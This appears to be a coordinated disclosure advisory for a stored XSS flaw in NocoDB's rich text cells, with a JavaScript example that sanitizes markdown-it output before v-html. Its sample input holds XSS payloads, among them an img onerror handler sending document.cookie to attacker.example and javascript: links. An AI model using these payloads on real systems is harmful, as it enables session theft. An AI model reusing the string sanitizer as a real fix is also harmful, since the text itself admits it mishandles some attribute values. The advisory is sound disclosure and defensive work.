Coordinated Disclosure Timeline

Summary

NocoDB version v0.301.2 is vulnerable to a stored cross-site scripting (XSS) attack (GHSL-2026-030) that allows malicious scripts to be injected into rich text cells, potentially leading to unauthorized script execution in the context of other users.

Project

nocodb

Tested Version

v0.301.2

Details

Stored Cross-Site Scripting in rich text cells (GHSL-2026-030)

A stored cross-site scripting vulnerability exists in NocoDB’s Rich Text cell rendering functionality. When a Long Text field is configured with rich text mode enabled, user-supplied content is parsed through a Markdown parser that has HTML passthrough enabled and is subsequently rendered using Vue’s v-html directive without sanitization. This allows authenticated attackers to inject malicious HTML/JavaScript that executes in the browser context of any user viewing the affected record, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of privileged users.

The v-html directive inside the TextArea component renders richTextContent, the parser's HTML output, directly into the DOM without any sanitization step in between.

The NcMarkdownParser uses markdown-it configured with html: true, which allows raw HTML to pass through unchanged.
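As an added illustration (this is not NocoDB's code and not the fix the project shipped), the JavaScript below models the gap described above: the string a Markdown renderer with raw-HTML passthrough emits for an attacker-controlled cell, and an allowlist sanitizer placed between that renderer and v-html. The sample renderer output is constructed; the tag and attribute allowlists and the helper names (sanitizeRichText, isSafeUrl, decodeEntities) are assumptions for the example. Production code should use a DOM-based sanitizer such as DOMPurify; this string-based version exists to show what that step has to do, including the entity-encoded and whitespace-padded scheme tricks it must catch.

```javascript
// Added example, not NocoDB code. Shows what v-html receives with and without a
// sanitization step after a Markdown renderer that passes raw HTML through.

// Constructed sample: what markdown-it with { html: true } emits for a cell an
// authenticated attacker controls. The raw HTML is forwarded unchanged.
const RENDERED_BY_PARSER = [
  '<p>Quarterly <strong>report</strong></p>',
  '<img src="x" onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  '<p><a href="javascript:alert(document.domain)">open</a></p>',
  '<p><a href="java&#115;cript:alert(1)">entity-encoded scheme</a></p>',
  '<script>alert(1)</script>',
].join('\n');

// Assumed allowlist: tags and per-tag attributes a rich text cell legitimately needs.
const ALLOWED_TAGS = new Set(['p', 'br', 'strong', 'em', 'b', 'i', 'u', 's', 'ul', 'ol',
  'li', 'a', 'img', 'h1', 'h2', 'h3', 'blockquote', 'code', 'pre']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt']) };
const URL_ATTRS = new Set(['href', 'src']);

// Decode numeric and common named entities so "java&#115;cript:" is judged as the
// "javascript:" the browser will make of it once the attribute is parsed.
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, e) => {
    if (e[0] !== '#') return named[e.toLowerCase()] ?? m;
    const cp = /^#x/i.test(e) ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
  });
}

// Full escaping for attribute values we re-emit (values are decoded first).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Text nodes arrive already entity-encoded from the renderer, so only neutralise
// stray angle brackets (e.g. an unmatched "<!--") instead of double-encoding "&amp;".
const escapeText = s => s.replace(/</g, '&lt;').replace(/>/g, '&gt;');

// Allow http(s), mailto and scheme-less (relative) URLs only. Control characters and
// whitespace are stripped first because browsers skip them when reading the scheme.
function isSafeUrl(value) {
  const u = decodeEntities(value).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const scheme = u.match(/^([a-z][a-z0-9+.-]*):/);
  return !scheme || ['http', 'https', 'mailto'].includes(scheme[1]);
}

// Rebuild the fragment from an allowlist: unknown tags are dropped (script/style
// bodies too), unknown attributes such as on* handlers are dropped, URL attributes
// must pass isSafeUrl. Tags are not balanced; the browser tolerates that.
function sanitizeRichText(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));
    last = m.index + m[0].length;
    const [, close, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) {
      if (!close && (name === 'script' || name === 'style')) {
        // Skip the element body as well; otherwise "alert(1)" would surface as text.
        const end = html.toLowerCase().indexOf(`</${name}`, last);
        if (end !== -1) {
          const gt = html.indexOf('>', end);
          last = gt === -1 ? html.length : gt + 1;
          tagRe.lastIndex = last;
        }
      }
      continue;
    }
    if (close) { out += `</${name}>`; continue; }
    const allowed = ALLOWED_ATTRS[name] ?? new Set();
    let attrs = '';
    for (const a of rawAttrs.matchAll(attrRe)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (!allowed.has(attr)) continue;                       // drops onerror, style, ...
      if (URL_ATTRS.has(attr) && !isSafeUrl(value)) continue; // drops javascript: URLs
      attrs += ` ${attr}="${escapeHtml(decodeEntities(value))}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out + escapeText(html.slice(last));
}

console.log('--- what v-html receives without sanitization ---\n' + RENDERED_BY_PARSER);
console.log('--- after sanitizeRichText ---\n' + sanitizeRichText(RENDERED_BY_PARSER));
```

Run it with Node: the first block of output is the renderer output exactly as it would reach v-html, the second shows the img without its onerror handler, both anchors without their javascript: href, and the script element gone. The string tokenizer above mishandles a literal `>` inside an attribute value, which is one reason a real fix should sanitize on the parsed DOM (DOMPurify) rather than on text. The other option implied by the description is disabling passthrough in markdown-it with `html: false`, which escapes raw HTML instead of forwarding it, at the cost of any intentional HTML in cells.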

Impact

This issue may lead to account takeover due to stored Cross-site scripting (XSS).

CWEs

CVE

Credit

This issue was discovered with the GitHub Security Lab Taskflow Agent and manually verified by GHSL team members @p- (Peter Stöckli) and @m-y-mo (Man Yue Mo).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2026-030 in any communication regarding this issue.